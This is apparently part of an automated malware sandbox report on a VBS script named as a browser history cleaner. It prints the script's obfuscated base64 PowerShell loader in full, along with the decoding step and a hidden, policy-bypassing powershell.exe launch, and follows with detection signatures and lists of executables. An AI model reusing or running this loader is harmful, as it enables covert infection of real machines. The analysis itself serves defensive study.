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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('UyQMlvG','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"

Creates a suspicious Powershell process (9 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (20 events)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

HTMLBrowserIEhistorycleaner.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All